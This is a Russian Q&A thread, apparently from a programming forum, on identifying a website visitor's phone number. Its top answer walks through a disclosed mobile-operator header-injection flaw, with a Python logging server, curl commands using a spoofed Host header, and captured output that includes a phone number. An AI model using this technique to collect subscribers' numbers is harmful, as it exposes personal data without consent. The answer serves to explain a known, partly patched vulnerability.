# Как определить номер мобильного телефона при посещении веб-страницы?

Tags: javascript, веб-программирование

Какие есть варианты определения мобильного номера пользователя? Возможно ли определить номер при посещении спец. веб-страницы? В данном случае определение номера нужно на стороне сервера.

Comment: *JavaScript не может читать/записывать произвольные файлы на жесткий диск, копировать их или вызывать программы. Он не имеет прямого доступа к операционной системе.* - https://learn.javascript.ru/intro

Comment: Это вопрос не технический, а маркетологический: как сделать чтобы человек оставил свой номер телефона. Когда посетитель заходит на ваш сайт, вы можете определить только его IP адрес, даже если он зашел с телефона

Comment: Есть один великолепный вариант: помещаете на сайт форму, с просьбой оставить номерок, вот и всё. Желающие поделятся, нежелающие - нет. Вот и всё.

Comment: А зачем? Вообще, определить чисто технически, пока по крайней мере, никак.
Здесь нужна социальная инженерия.

Comment: Если не касаться DPI уязвимостей которые почти все закрыли в конце 2018 года, самая адекватная описывающая сервисы по определению номеров телефонов посетителей сайта статья на мой взгляд по ссылке - http://blog.ivru.net/?id=183 в ней описано и как технически может быть реализовано определение и юридические моменты и влияние техологии на SEO, причём описано понятным языком, так что не IT-шники могут читать, рекомендую с ней ознакомиться если интересуетесь вопросом. И есть ещё группа https://vk.com/phonescan в ней обсуждают технологию те кто уже пользуются или собираются, ну и IT-шники.

Answer (score 6):

Система глубокого анализа трафика настроена так, что добавляет служебные HTTP-заголовки при выполнении HTTP-запроса на сайты (хосты) из списка, определяемого оператором. В заголовках может содержаться внутренний IP-адрес абонента, номер телефона (MSISDN), IMEI и IMSI-идентификаторы, идентификатор базовой станции (вышки), к которой подключен абонент (ECI/TAC).

Нам потребуется установить на сервер в интернете простой HTTP-сервер, который будет принимать запрос, показывать его на экране, и отправлять HTTP-ответ. Что-то вроде этого:

```
#!/usr/bin/env python3
import socketserver

class MyTCPHandler(socketserver.BaseRequestHandler):
    def handle(self):
        while True:
            r = self.request.recv(8192)
            if b"\r\n\r\n" in r or b"\n\n" in r:
                break
            if not r:
                return
        print("-----\r\n" + r.decode() + "-----")
        self.request.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\n")
        self.request.sendall(b"OK")
        return

if __name__ == "__main__":
    HOST, PORT = "0.0.0.0", 80
    socketserver.ForkingTCPServer.allow_reuse_address = True
    server = socketserver.ForkingTCPServer((HOST, PORT), MyTCPHandler)
    server.allow_reuse_address = True
    server.serve_forever()
```

Отправим HTTP-запрос, используя SIM-карту Мегафон:

```
$ curl myserver.com
OK
```

На сервер пришло:

```
GET / HTTP/1.1
Host: myserver.com
User-Agent: curl/7.51.0
Accept: */*
```

Ничего необычного. Изменим заголовок Host на какой-нибудь внутренний домен оператора, например, на основной сайт megafon.ru:

```
$ curl myserver.com -H "Host: megafon.ru"
```

На сервере:

```
GET / HTTP/1.1
Host: megafon.ru
User-Agent: curl/7.51.0
Accept: */*
X-Real-IP: 100.114.20.123
X-NOKIA-MSISDN: 79319350195
```

На сервер пришли не только HTTP-заголовки, отправленные curl, но и дополнительные заголовки X-Real-IP и X-NOKIA-MSISDN, содержащие внутренний IP-адрес (за Carrier-grade NAT) и номер телефона!

Почему так получилось? По всей видимости, при составлении списка забыли привязать конкретные домены к конкретным IP-адресам или диапазонам, и проверка открытия сайта из листа выполняется только сравнением HTTP-заголовка Host.

Источник(там намного больше тонкостей, например, перечень внутренних доменов): https://habrahabr.ru/post/345852/

P.S.: не стоит забывать, что это именно **уязвимость**, то есть это ошибка в системах мобильных операторов, вполне возможно, что скоро эту дырку закроют.

P.S.P.S.: мтс данную уязвимость исправил.